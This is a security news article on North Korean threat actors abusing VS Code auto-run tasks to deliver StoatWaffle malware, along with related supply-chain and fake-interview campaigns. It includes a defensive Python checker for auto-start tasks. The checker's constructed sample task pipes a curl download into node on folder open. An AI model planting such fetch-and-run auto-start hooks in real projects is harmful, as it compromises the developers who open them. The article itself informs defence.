North Korean Hackers Exploit VS Code Auto-Run Tasks to Deploy StoatWaffle Malware

The North Korean threat actors behind the Contagious Interview campaign, also tracked as WaterPlum, have been linked to a malware family known as StoatWaffle that is distributed through malicious Microsoft Visual Studio Code (VS Code) projects.

The use of VS Code “tasks.json” to distribute malware is a relatively new technique that the threat actor has employed since December 2025. The attack relies on the “runOn: folderOpen” option so that the task starts executing automatically every time the project folder is opened in VS Code.

“This function is configured to download data from a web application in Vercel regardless of the OS [operating system] you are using,” said NTT Security in a report published last week. “Although we assume that the operating system is Windows in this article, the basic behavior is the same for any OS.”

The downloaded payload first checks whether Node.js is installed on the workstation. If not, it downloads Node.js from the official website and installs it. It then launches a downloader that repeatedly polls the external server to fetch a next-stage downloader, which behaves the same way: it contacts another endpoint on the same server and executes the response it receives as Node.js code.

StoatWaffle has been found to deliver two different modules –

  • A stealer that harvests credentials and browser extension data stored in web browsers (Chromium-based browsers and Mozilla Firefox) and uploads them to a command-and-control (C2) server. If the compromised host runs macOS, it also steals the iCloud Keychain database.
  • A remote access trojan (RAT) that communicates with the C2 server to receive and execute commands on the infected host. The commands allow the malware to change the current working directory, enumerate files and directories, execute Node.js code, upload a file, recursively search a given directory and list or upload files matching a specific keyword, execute shell commands, and terminate itself.

“StoatWaffle is a malware that uses Node.js, and has Stealer and RAT modules,” the Japanese security vendor said. “WaterPlum continues to develop new malware and update existing ones.”

This development coincides with several campaigns launched by the threat actor against the open-source ecosystem –

  • A set of malicious npm packages distributed the PylangGhost malware, marking the first time PylangGhost has been distributed via npm packages.
  • A campaign known as PolinRider injected a malicious JavaScript payload into hundreds of public GitHub repositories, culminating in the deployment of a new version of BeaverTail, a known stealer and downloader associated with Contagious Interview.
  • Among the compromised repositories are four belonging to the Neutralinojs GitHub organization. The attack allegedly compromised the GitHub account of a long-time Neutralinojs contributor with organization-level write access and used it to inject JavaScript code that fetches encrypted payloads from Tron, Aptos, and the Binance Smart Chain (BSC) in order to download and run BeaverTail. Victims are believed to have been infected via a malicious VS Code extension or npm package.

Microsoft, in an analysis of Contagious Interview published this month, said that the threat actors gain initial access to developer systems through “persuasive recruitment processes” that mimic legitimate technical discussions, eventually persuading victims to run malicious commands or packages hosted on GitHub, GitLab, or Bitbucket as part of an assessment.

In some cases, the target is approached on LinkedIn. The people chosen for this social engineering attack are not junior engineers, however, but founders, CTOs, and senior engineers in the cryptocurrency or Web3 field, who are likely to have elevated access to the company’s technical infrastructure and cryptocurrency wallets. A recent incident involved attackers successfully impersonating the founder of AllSecure.io through a fake interview.

Some of the key malware families used in these attack chains include OtterCookie (a backdoor capable of stealing large amounts of data), InvisibleFerret (a Python-based backdoor), and FlexibleFerret (a modular backdoor implemented in Go and Python). Although InvisibleFerret is usually delivered via BeaverTail, recent attacks have been observed delivering it as a follow-on payload after initial access was obtained via OtterCookie.

It is worth mentioning here that FlexibleFerret is also called WeaselStore. Its Go and Python versions go by the monikers GolangGhost and PylangGhost, respectively.

In a sign that the threat actors are continually refining their tradecraft, a newer version of the VS Code projects replaces the Vercel-based domains with GitHub Gist-hosted documents to download and execute the next-stage payload, which ultimately leads to the deployment of FlexibleFerret. These VS Code projects are hosted on GitHub.

“By embedding targeted malware delivery directly into interview tools, coding tests, and testing workflows that developers naturally trust, threat actors are exploiting job seekers they place in the hiring process during periods of high motivation and time pressure, reducing suspicion and resistance,” the tech giant said.

In response to the ongoing exploitation of VS Code tasks, Microsoft shipped a mitigation in the January 2026 update (version 1.109) that introduces a new “task.allowAutomaticTasks” setting. It defaults to “off”, preventing unintended execution of tasks defined in “tasks.json” when a workspace is opened.

“The update also prevents the setting from being defined at the workspace level, so malicious repositories with their own .vscode/settings.json file should not be able to override a user’s (global) setting,” Abstract Security said.

“This version and the latest February 2026 release (version 1.110) introduce a second prompt that alerts the user when an autorun task is detected in a newly opened workspace. This serves as an additional safeguard after the user accepts the Workspace Trust prompt.”
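The auto-start hook and the “task.allowAutomaticTasks” mitigation described above, as an added defensive check that is not code from NTT Security, Microsoft or VS Code: it parses a workspace’s tasks.json (which VS Code reads as JSONC, so comments and trailing commas must be stripped first) and flags any task set to run on folderOpen, and separately flags a workspace settings.json that tries to force automatic tasks on. The sample tasks.json is constructed for this example.

```python
import json
import re

def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments outside string literals, then trailing commas.
    String-aware for comments (a "https://" inside a command survives); the
    trailing-comma pass is a plain regex and does not look inside strings."""
    out, i, n = [], 0, len(text)
    while i < n:
        ch = text[i]
        if ch == '"':                       # copy a whole string literal verbatim
            j = i + 1
            while j < n and text[j] != '"':
                j += 2 if text[j] == "\\" else 1
            out.append(text[i:j + 1])
            i = j + 1
        elif text.startswith("//", i):      # line comment: skip to end of line
            nl = text.find("\n", i)
            i = n if nl == -1 else nl
        elif text.startswith("/*", i):      # block comment: skip past "*/"
            end = text.find("*/", i + 2)
            i = n if end == -1 else end + 2
        else:
            out.append(ch)
            i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))

def find_autorun_tasks(tasks_json: str) -> list:
    """Labels of tasks VS Code would start as soon as the folder is opened."""
    doc = json.loads(strip_jsonc(tasks_json))
    return [t.get("label", "<unlabelled>") for t in doc.get("tasks", [])
            if t.get("runOptions", {}).get("runOn") == "folderOpen"]

def workspace_forces_autotasks(settings_json: str) -> bool:
    """True if a workspace .vscode/settings.json tries to switch automatic tasks on."""
    return json.loads(strip_jsonc(settings_json)).get("task.allowAutomaticTasks") == "on"

# Constructed sample tasks.json (not from any real project): a comment, a trailing
# comma, and a download command whose URL also contains "//".
SAMPLE_TASKS = """{
  // build helpers
  "version": "2.0.0",
  "tasks": [
    {"label": "lint", "type": "shell", "command": "npm run lint",},
    {"label": "setup", "type": "shell",
     "command": "curl -s https://example.invalid/setup | node",
     "runOptions": {"runOn": "folderOpen"}} /* auto-starts */
  ]
}"""
```

Running `find_autorun_tasks(SAMPLE_TASKS)` over the sample returns only the “setup” task; a repository whose settings.json makes `workspace_forces_autotasks` return True is attempting exactly the override that version 1.109 blocks.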

In recent months, North Korean threat actors have also been running a malware campaign against cryptocurrency professionals that relies on LinkedIn social engineering, fake building firms, and fake video conference links. The activity overlaps with tracked clusters such as GhostCall and UNC1069.

“The series of attacks culminates in a fake ClickFix-style CAPTCHA page that tricks victims into executing commands placed on the clipboard in their environment,” MacPaw’s Moonlock Lab said. “The campaign is cross-platform by design, delivering compatible payloads for both macOS and Windows.”

The findings come as the US Department of Justice (DoJ) announced the sentencing of three men — Audricus Phagnasay, 25, Jason Salazar, 30, and Alexander Paul Travis, 35 — for their roles in a North Korean information technology (IT) worker scheme that violated international sanctions. All three previously pleaded guilty in November 2025.

Phagnasay and Salazar were each sentenced to three years of probation and fined $2,000. They were also ordered to forfeit the proceeds of their participation in the wire fraud conspiracy. Travis was sentenced to one year in prison and ordered to forfeit $193,265 in proceeds from the scheme.

“These men gave the keys to the Internet empire to North Korean technology workers overseas who wanted to raise illegal money for the North Korean government — all in return for what seemed like easy money to them,” Margaret Heap, the U.S. attorney for the Southern District of Georgia, said in a statement.

Last week, Flare and IBM X-Force published a detailed look at the operations and internal structure of the IT worker program, highlighting how the IT workers study at prestigious universities in North Korea and themselves undergo a rigorous interview process before joining the program.

“They are considered special members of North Korean society and have become an important part of the strategic goals of the North Korean government,” the companies noted. “These purposes include, but are not limited to, income generation, remote employment, theft of business and proprietary information, extortion, and providing support to other North Korean groups.”
